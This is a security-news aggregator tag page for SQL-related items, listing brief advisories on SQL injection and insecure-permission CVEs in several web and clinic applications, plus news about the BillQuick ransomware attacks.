Security
Headlines
HeadlinesLatestCVEs

Tag

#sql

Simplephpscripts Simple CMS 2.1 SQL Injection

Simplephpscripts Simple CMS version 2.1 suffers from a remote SQL injection vulnerability.

Packet Storm
Open in Source
#vulnerability#red_hat#vulnerability#ubuntu#vulnerability#red_hat#kubernetes#linux#vulnerability#vulnerability#mac#red_hat#vulnerability#vulnerability#sql#vulnerability#vulnerability#sql#vulnerability#vulnerability#ios#ubuntu#vulnerability#linux#red_hat#java#ubuntu#dos#sql#vulnerability#vulnerability#red_hat#vulnerability#vulnerability#sql#vulnerability
SQL injection flaw in billing software app tied to US ransomware infection

BillQuick customers blindsided by recently patched web security flaw

Africa sees increase in ransomware, botnet attacks – but online scams still pose biggest threat

Fraud is still the primary goal of cybercriminals operating across the continent, Interpol warns in latest market report

CVE-2021-37363: Gestionale Open - Software Gestionale ERP Gratuito per aziende

An Insecure Permissions issue exists in Gestionale Open 11.00.00. A low privilege account is able to rename the mysqld.exe file located in bin folder and replace with a malicious file that would connect back to an attacking computer giving system level privileges (nt authority\system) due to the service running as Local System. While a low privilege user is unable to restart the service through the application, a restart of the computer triggers the execution of the malicious file. The application also have unquoted service path issues.

CVE-2021-37364: OpenClinic GA download | SourceForge.net

OpenClinic GA 5.194.18 is affected by Insecure Permissions. By default the Authenticated Users group has the modify permission to openclinic folders/files. A low privilege account is able to rename mysqld.exe or tomcat8.exe files located in bin folders and replace with a malicious file that would connect back to an attacking computer giving system level privileges (nt authority\system) due to the service running as Local System. While a low privilege user is unable to restart the service through the application, a restart of the computer triggers the execution of the malicious file. The application also have unquoted service path issues.

CVE-2021-26609: KrCERT/CC - KISA 인터넷 보호나라&KrCERT

A vulnerability was found in Mangboard(WordPress plugin). A SQL-Injection vulnerability was found in order_type parameter. The order_type parameter makes a SQL query using unfiltered data. This vulnerability allows a remote attacker to steal user information.

CVE-2021-37371: Online Student Admission System in PHP Free Source Code | Free Source Code, Projects & Tutorials

Online Student Admission System 1.0 is affected by an unauthenticated SQL injection bypass vulnerability in /admin/login.php.

Hackers Exploited Popular BillQuick Billing Software to Deploy Ransomware

Cybersecurity researchers on Friday disclosed a now-patched critical vulnerability in multiple versions of a time and billing system called BillQuick that's being actively exploited by threat actors to deploy ransomware on vulnerable systems. CVE-2021-42258, as the flaw is being tracked as, concerns an SQL-based injection attack that allows for remote code execution and was successfully